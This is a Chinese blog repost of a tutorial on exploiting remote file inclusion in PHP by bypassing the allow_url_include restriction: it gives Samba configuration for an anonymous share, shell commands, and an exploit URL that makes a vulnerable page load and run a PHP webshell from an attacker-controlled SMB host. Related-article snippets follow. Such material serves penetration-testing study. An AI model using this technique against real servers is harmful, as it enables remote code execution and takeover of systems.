利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制

最新推荐文章于 2022-10-14 16:59:25 发布
最新推荐文章于 2022-10-14 16:59:25 发布
阅读量324 收藏 1
点赞数 1
文章标签: php shell 运维
原文链接:http://www.cnblogs.com/17bdw/p/10987338.html
版权

来源:http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1

前言

文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP或FTP url包含远程文件。但是使用SMB依旧可以加载。

攻击思路

攻击者需要配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP Webshell。

  • 配置php.ini文件禁用 "allow_url_fopen" 和 "allow_url_include" 。

  • 配置SMB服务器的匿名读访问权

  • 利用有漏洞的PHP程序访问SMB

PHP环境设置

在PHP.ini文件里把 "allow_url_fopen" 和 "allow_url_include" 设为 "Off"。

当前配置PHP版本为“5.5.11”:

549050-20190606232344911-735909266.png

确定PHP不允许远程文件包含

549050-20190606232605178-215029869.png

试图从远程主机包含PHP Web shell时,应用程序抛出错误并且没有发生RFI。

配置匿名读访问SAMBA服务器(Linux)

使用下面提到的命令安装SAMBA服务器:

创建SMB共享目录(/var/www/html/pub/)

  mkdir /var/www/html/pub/

549050-20190606233537132-203154912.png

配置SMB共享目录的权限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

549050-20190606233653521-79247714.png

运行以下提到的命令删除SAMBA服务器配置文件的默认内容

  echo > /etc/samba/smb.conf

将下面提到的内容放在'/etc/samba/smb.conf'文件中

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

重新启动SAMBA服务器

  service smbd restart

成功重新启动SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不需要凭据验证。

 \\192.168.0.3\

549050-20190606234549411-859693275.png

在SMB共享中托管PHP Web shell

在目录'/var/www/html/pub'中托管PHP shell

549050-20190606235059819-1209344095.png

利用Windows Explorer打开SMB访问 Win+R直接访问。

 \\192.168.0.3\ica\

549050-20190606235254531-1212195949.png

攻击文件包含漏洞参数

利用SMB的php webshell路径传入文件包含漏洞的参数里。

 http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php

SMB共享中获取Web shell并在应用程序服务器上顺利执行PHP代码,绕过了远程文件包含的限制。

549050-20190606235745979-1260961171.png

转载于:https://www.cnblogs.com/17bdw/p/10987338.html

weixin_30745641
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP远程文件包含RFI)并绕过远程URL包含限制
Ms08067安全实验室
04-06 1648
文章来源|MS08067 公众号粉丝投稿本文作者:VastSky(Ms08067实验室粉丝)前言本文我们讲如何绕过远程URL包含限制。在PHP开发环境php.ini配置文里”allow_u...
使用SMB共享来绕过php远程文件包含限制执行RFI利用
10-16
由于SMB共享是允许匿名访问的,PHP代码将成功加载并执行Web shell,绕过了原本的远程文件包含限制。 总结起来,通过利用SMB共享,攻击者可以在PHP环境禁止远程HTTP/FTP文件包含的情况下,依然实现RFI攻击。这凸显了...
php文件包含
m0_64361111的博客
02-28 1387
概念 把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。这一调用文件的过程被称为包含。 原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。泄露甚
PHP文件包含漏洞复现
春日野穹
09-17 2937
引言~ 老规矩,介绍一波原理先 PHP文件包含原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个...
本地包含与远程包含
qq_68233961的博客
10-14 478
本地包含与远程包含漏洞
LFI(本地文件包含)、RFI(远程文件包含)、PHP封装协议(伪协议)安全问题学习
weixin_45116657的博客
02-04 2442
友情链接:https://www.cnblogs.com/LittleHann/p/3665062.html 目录 一、文件包含的基本概念 1、要想成功利用文件包含漏洞,需要满足下面的条件 (1)include()等函数通过动态变量的方式引入需要包含文件 (2)用户能够控制该动态变量 二、LFI(Local File Include)本地文件包含 1、00字符截断 防御方法: ...
Web应用安全:远程文件包含利用.pptx
06-20
【远程文件包含(Remote File Inclusion,RFI)】是一种常见的Web应用安全漏洞,它允许攻击者通过操纵应用程序,使其包含并执行远程服务器上的文件RFI与本地文件包含(Local File Inclusion,LFI)相似,不同之处...
元器件应用中的Vishay推新型 RFI/EMI 抑制电容器
12-06
特别的是,VY1系列因其8kV的峰值电压承受能力,被广泛应用于需要最高安全标准且需长期运行的设备中,如彩色电视(CTV)、液晶显示器(LCD)、阴极射线管显示器(CRT)、录像机(VCR)和DVD播放机,以及高频镇流器等...
信息安全技术:远程文件包含漏洞.pptx
最新发布
11-01
远程文件包含漏洞(Remote File Inclusion,简称RFI)是一种常见的网络安全问题,尤其在基于PHP的Web应用程序中较为常见。这种漏洞允许攻击者通过指定远程URL包含并执行非预期的外部文件,从而可能对系统造成严重...
元器件应用中的Vishay新型RFI/EMI抑制电容器具有500Vac及300Vac的额定电压
12-09
Vishay公司近期发布的新款VY1和VY2电容器系列,是针对RFI(射频干扰)和EMI(电磁干扰)抑制而设计的高性能组件,旨在提升电子设备的稳定性和可靠性。这两款瓷盘电容器的额定电压分别为500Vac和300Vac,适用于多种...
php 怎么远程包含,利用PHP应用程序中的远程文件包含RFI)并绕过远程URL包含限制...
weixin_33125137的博客
03-18 612
前言文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP或FTP url包含远程文件。但是使用SMB依旧可以加载。攻击思路攻击者需要配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP Webshell。配置php.ini文件禁用 "allow_url_...
文件包含常见绕过方法
1stPeak's Blog
06-15 7675
文件包含原理 开发人员将相同函数写入单独的文件中,需要使用某个函数直接调用此文件,无需再次编写,这种文件调用过程称为文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含文件设置为变量,用来动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数 include: 包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行 include_once: 这个函数跟和include语句类似,唯一区别是如果该文件中已经被包含过,则不会再次包含 req
文件包含漏洞及绕过方法(以php为例)
热门推荐
HMX404的博客
09-27 1万+
一,文件包含漏洞的由来 简单的来说,为了减少“重复造轮子”引入了文件包含函数,可以直接使用文件中的文件和代码。当通过动态获文件时,或者需要引用网络上其他文件时,用户通过对变量值的修改访问规定的文件,但是未对变量值进行校验,导致有了可乘之机,一般在php中常见。 <?php $file = $_GET('file'); include($file); #除此之外还有Include_once;require;require_once;highlight_file; #show_source;readfil
php本地文件包含&远程文件包含
think_ycx的专栏
04-07 7725
本地文件包含&远程文件包含
文件包含漏洞
sh0rk的博客
11-24 323
文件包含什么是文件包含利用方法本地文件包含远程文件包含进阶防御 什么是文件包含 顾名思义,打开并包含本地或者远程文件的漏洞 利用方法 本地文件包含 远程文件包含 进阶 LFI with PHPInfo 防御 严格判断包含中的参数是否外部可控 路径限制限制包含文件只能在某一文件夹内,一定要禁止目录跳转字符如&quot;../&quot;,&quot;..\&quot; 使用白名单!!! ...
php 远程文件包含配置项,文件包含漏洞总结 - ghtwf01 - Welcome to ghtwf01's blog
weixin_29246195的博客
03-11 513
文件包含简介服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间文件包含函数require()require_once()include()include_once()include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错...
网络安全-文件包含漏洞原理、攻击及防御
关注网络安全、云原生安全
08-14 5949
目录 简介 类型 原理 攻击 防御 简介 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 类型 根据不同的配置环境,文件包含漏洞分为如下两种情况:1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。2.远程文件
PHP绕过远程文件限制,利用PHP应用程序中的远程文件包含RFI)并绕过远程URL包含限制...
weixin_42514921的博客
03-21 269
前言文章讲诉了如何绕过远程URL包含限制。在PHP开发环境php.ini配置文件里”,allow_url_include“为“off”的情况下,不允许PHP加载远程HTTP或FTP url包含远程文件。但是使用SMB依旧可以加载。攻击思路攻击者需要配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP Webshell。配置php.ini文件禁用 "allow_url_...
PHP渗透技巧拓展】————3、LFI、RFIPHP封装协议安全问题学习
Fly_鹏程万里
02-01 782
本文希望分享一些本地文件包含、远程文件包含PHP的封装协议(伪协议)中可能包含的漏洞 目录 1. 文件包含的基本概念 2. LFI(Local File Include) 3. RFI(Remote File Include) 4. PHP中的封装协议(伪协议)、PHP的流式文件操作模式所带来的问题 1. 文件包含的基本概念 严格来说,文件包含漏洞是"代码注入"的一种。"代码注入"...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值